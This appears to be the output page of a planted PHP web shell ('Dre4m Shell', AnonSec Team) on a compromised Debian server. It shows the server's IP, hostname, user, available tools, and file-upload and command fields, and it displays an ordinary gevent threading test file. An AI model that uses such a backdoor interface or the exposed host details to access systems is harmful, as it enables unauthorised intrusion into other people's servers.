Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.147.81.128
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/root/proc/2/root/proc/2/cwd/srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/root/proc/2/root/proc/2/cwd/srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/test__threading_native_before_monkey.py
# If stdlib threading is imported *BEFORE* monkey patching, *and*
# there is a native thread created, we can still get the current
# (main) thread, and it's not a DummyThread.
# Joining the native thread also does not fail

import threading
from time import sleep as time_sleep

import gevent.testing as greentest

class NativeThread(threading.Thread):
    do_run = True

    def run(self):
        while self.do_run:
            time_sleep(0.1)

    def stop(self, timeout=None):
        self.do_run = False
        self.join(timeout=timeout)

native_thread = None

class Test(greentest.TestCase):

    def test_main_thread(self):
        current = threading.current_thread()
        self.assertFalse(isinstance(current, threading._DummyThread))
        self.assertTrue(isinstance(current, monkey.get_original('threading', 'Thread')))
        # in 3.4, if the patch is incorrectly done, getting the repr
        # of the thread fails
        repr(current)

        if hasattr(threading, 'main_thread'): # py 3.4
            self.assertEqual(threading.current_thread(), threading.main_thread())

    @greentest.ignores_leakcheck # because it can't be run multiple times
    def test_join_native_thread(self):
        self.assertTrue(native_thread.is_alive())

        native_thread.stop(timeout=1)
        self.assertFalse(native_thread.is_alive())

        # again, idempotent
        native_thread.stop()
        self.assertFalse(native_thread.is_alive())


if __name__ == '__main__':
    native_thread = NativeThread()
    native_thread.start()

    # Only patch after we're running
    from gevent import monkey
    monkey.patch_all()

    greentest.main()

Anon7 - 2022
AnonSec Team